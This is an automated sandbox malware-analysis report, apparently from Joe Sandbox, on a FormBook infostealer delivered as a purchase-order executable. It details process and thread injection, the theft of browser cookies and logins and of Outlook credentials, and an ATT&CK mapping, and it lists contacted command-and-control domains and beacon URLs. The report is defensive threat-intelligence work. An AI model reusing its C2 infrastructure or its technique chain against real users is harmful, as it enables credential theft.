                Source: C:\Windows\SysWOW64\pcaui.exeThread APC queued: target process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\PO #2411071822.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 26F9008Jump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0041B106 LogonUserW,0_2_0041B106
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_003E3D19
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0042411C SendInput,keybd_event,0_2_0042411C
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004274E7 mouse_event,0_2_004274E7
                Source: C:\Users\user\Desktop\PO #2411071822.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #2411071822.exe"Jump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0041A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0041A66C
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004271FA
                Source: olMdMEBIcgVB.exe, 00000003.00000002.3891741842.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000000.2076923243.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891885830.0000000001651000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: PO #2411071822.exe, olMdMEBIcgVB.exe, 00000003.00000002.3891741842.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000000.2076923243.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891885830.0000000001651000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: olMdMEBIcgVB.exe, 00000003.00000002.3891741842.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000000.2076923243.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891885830.0000000001651000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: PO #2411071822.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: olMdMEBIcgVB.exe, 00000003.00000002.3891741842.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000000.2076923243.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891885830.0000000001651000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004065C4 cpuid 0_2_004065C4
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0043091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0043091D
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0045B340 GetUserNameW,0_2_0045B340
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00411E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00411E8E
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003FDDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.2470000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3892013013.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3891999951.0000000003140000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2152486099.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: PO #2411071822.exeBinary or memory string: WIN_81
                Source: PO #2411071822.exeBinary or memory string: WIN_XP
                Source: PO #2411071822.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: PO #2411071822.exeBinary or memory string: WIN_XPe
                Source: PO #2411071822.exeBinary or memory string: WIN_VISTA
                Source: PO #2411071822.exeBinary or memory string: WIN_7
                Source: PO #2411071822.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.2470000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3892013013.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3891999951.0000000003140000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2152486099.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00438C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00438C4F
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0043923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0043923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		2
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560695 Sample: PO #2411071822.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 28 www.rtpterbaruwaktu3.xyz 2->28 30 www.54248711.xyz 2->30 32 12 other IPs or domains 2->32 42 Antivirus detection for URL or domain 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 4 other signatures 2->50 10 PO #2411071822.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 olMdMEBIcgVB.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 pcaui.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 olMdMEBIcgVB.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 rtpterbaruwaktu3.xyz 103.21.221.87, 49726, 80 LINKNET-ID-APLinknetASNID unknown 22->34 36 www.54248711.xyz 161.97.142.144, 50014, 50015, 80 CONTABODE United States 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PO #2411071822.exe37%ReversingLabsWin32.Trojan.AutoitInject
                PO #2411071822.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                www.mrpokrovskii.pro1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.llljjjiii.shop/rsvy/?cla=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.smartcongress.net/11t3/0%Avira URL Cloudsafe
                http://www.70kdd.top/klhq/?cla=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.mrpokrovskii.pro/2pji/0%Avira URL Cloudsafe
                http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxw0%Avira URL Cloudsafe
                http://www.gogawithme.live/6gtt/?cla=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/7yx4/?jbeXk=EHbdQPuX&cla=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag==0%Avira URL Cloudsafe
                http://www.70kdd.top/klhq/0%Avira URL Cloudsafe
                http://www.acond-22-mvr.click/w9z4/?jbeXk=EHbdQPuX&cla=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ==100%Avira URL Cloudmalware
                http://www.ampsamkok88.shop/huvt/?cla=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimx0%Avira URL Cloudsafe
                http://www.54248711.xyz0%Avira URL Cloudsafe
                http://www.mrpokrovskii.pro/2pji/?cla=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.acond-22-mvr.click/w9z4/100%Avira URL Cloudmalware
                http://www.matteicapital.online/Capital_Investment_Advisors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEh0%Avira URL Cloudsafe
                http://www.llljjjiii.shop/rsvy/0%Avira URL Cloudsafe
                http://www.matteicapital.online/Working_Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S0%Avira URL Cloudsafe
                http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns0%Avira URL Cloudsafe
                http://www.gogawithme.live/6gtt/0%Avira URL Cloudsafe
                http://www.ytsd88.top/egqi/0%Avira URL Cloudsafe
                http://www.ytsd88.top/egqi/?cla=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.matteicapital.online/Raising_Capital_for_Business.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WE0%Avira URL Cloudsafe
                http://www.ampsamkok88.shop/huvt/0%Avira URL Cloudsafe
                http://www.Matteicapital.online0%Avira URL Cloudsafe
                http://www.54248711.xyz/jm2l/0%Avira URL Cloudsafe
                http://www.matteicapital.online/hyyd/?jbeXk=EHbdQPuX&cla=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA==0%Avira URL Cloudsafe
                http://www.matteicapital.online/hyyd/0%Avira URL Cloudsafe
                http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.llljjjiii.shop
                		8.210.114.150
                		truefalse
                  		unknown
                  www.ampsamkok88.shop
                  		172.67.209.48
                  		truefalse
                    		unknown
                    www.acond-22-mvr.click
                    		199.59.243.227
                    		truefalse
                      		unknown
                      www.mrpokrovskii.pro
                      		194.85.61.76
                      		truefalseunknown
                      smartcongress.net
                      		146.88.233.115
                      		truefalse
                        		unknown
                        www.matteicapital.online
                        		208.91.197.27
                        		truefalse
                          		unknown
                          70kdd.top
                          		38.47.232.124
                          		truefalse
                            		unknown
                            www.54248711.xyz
                            		161.97.142.144
                            		truetrue
                              		unknown
                              www.ytsd88.top
                              		47.76.213.197
                              		truefalse
                                		unknown
                                www.gogawithme.live
                                		209.74.77.109
                                		truefalse
                                  		unknown
                                  rtpterbaruwaktu3.xyz
                                  		103.21.221.87
                                  		truetrue
                                    		unknown
                                    www.70kdd.top
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.rtpterbaruwaktu3.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.smartcongress.net
                                        		unknown
                                        		unknownfalse
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.rtpterbaruwaktu3.xyz/7yx4/?jbeXk=EHbdQPuX&cla=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag==false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.llljjjiii.shop/rsvy/?cla=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.gogawithme.live/6gtt/?cla=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.smartcongress.net/11t3/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.acond-22-mvr.click/w9z4/?jbeXk=EHbdQPuX&cla=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ==false
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.mrpokrovskii.pro/2pji/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ampsamkok88.shop/huvt/?cla=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.70kdd.top/klhq/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.70kdd.top/klhq/?cla=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mrpokrovskii.pro/2pji/?cla=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.acond-22-mvr.click/w9z4/false
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.llljjjiii.shop/rsvy/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ampsamkok88.shop/huvt/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.gogawithme.live/6gtt/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ytsd88.top/egqi/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ytsd88.top/egqi/?cla=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.54248711.xyz/jm2l/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.matteicapital.online/hyyd/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.matteicapital.online/hyyd/?jbeXk=EHbdQPuX&cla=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA==false
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabpcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://dts.gnpge.comolMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://cdn.consentmanager.netpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.bt.cn/?from=404pcaui.exe, 00000004.00000002.3892630131.00000000065BE000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003BAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://i2.cdn-image.com/__media__/pics/28903/search.png)pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.compcaui.exe, 00000004.00000002.3892630131.0000000006108000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.00000000036F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
